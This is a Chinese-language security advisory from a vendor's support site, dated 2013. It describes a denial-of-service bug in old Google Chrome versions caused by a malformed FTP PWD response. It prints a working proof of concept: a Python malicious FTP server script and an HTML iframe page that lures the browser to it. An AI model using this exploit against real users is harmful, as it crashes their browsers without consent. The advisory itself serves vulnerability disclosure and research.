当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Google Chrome OOB数组索引FTP PWD响应拒绝服务漏洞

信息来源:Tobias Klein      发表日期:2013-01-03 17:45:00

Google Chrome是由Google开发的一款Web浏览工具。

Google Chrome没有正确处理FTP PWD命令服务器响应,在实现上存在越界数组索引漏洞,通过诱使受害者浏览特制网站,其中包含指向恶意FTP服务器的iframe,远程攻击者可利用此漏洞造成浏览器崩溃。

受影响系统:

Google Chrome <= 4.1.249.1042 (Build 42199)

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Malicious FTP server:

 

K:\\BUGS\\CHROME>type poc.py

from socket import *

from struct import pack

from time import sleep

 

host = "0.0.0.0"

port = 21

 

s = socket(AF_INET, SOCK_STREAM)

s.bind((host, port))

s.listen(1)

print "\\n[+] Google Chrome (4.1.249.1042) Denial of Service poc"

print "[+] Listening on port %d ..." % port

 

cl, addr = s.accept()

print "[+] Connection accepted from %s" % addr[0]

 

buffer = "220 Google Chrome (4.1.249.1042) Denial of Service poc"

buffer += "\\r\\n"

cl.send(buffer)

 

cl.recv(128)

buffer = "331 Password required for anonymous."

buffer += "\\r\\n"

cl.send(buffer)

 

cl.recv(128)

buffer = "230 User anonymous logged in."

buffer += "\\r\\n"

cl.send(buffer)

 

cl.recv(128)

buffer = "215 UNIX Type: bib"

buffer += "\\r\\n"

cl.send(buffer)

 

cl.recv(128)

buffer = "257 \\"\\""

buffer += "\\r\\n"

cl.send(buffer)

 

print "[+] Sending buffer: OK\\n"

 

sleep(1)

cl.close()

s.close()

- - - - - ---

 

Start the poc server:

 

K:\\BUGS\\CHROME>python poc.py

 

[+] Google Chrome (4.1.249.1042) Denial of Service poc

[+] Listening on port 21 ...

 

 

Open the following sample HTML page in Chrome:

 

- - - - - ---

<html>

 <body>

  <iframe name="POC" src="ftp://127.0.0.1">

 </body>

<html>

- - - - - ---

解决办法:

厂商补丁:

 

Google

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.google.com

 

参考信息:

http://www.enigmagroup.org/exploits/platform/windows/dos/21248/%22Google-Chrome-4.1-OOB-Array-Indexing-Bug%22.html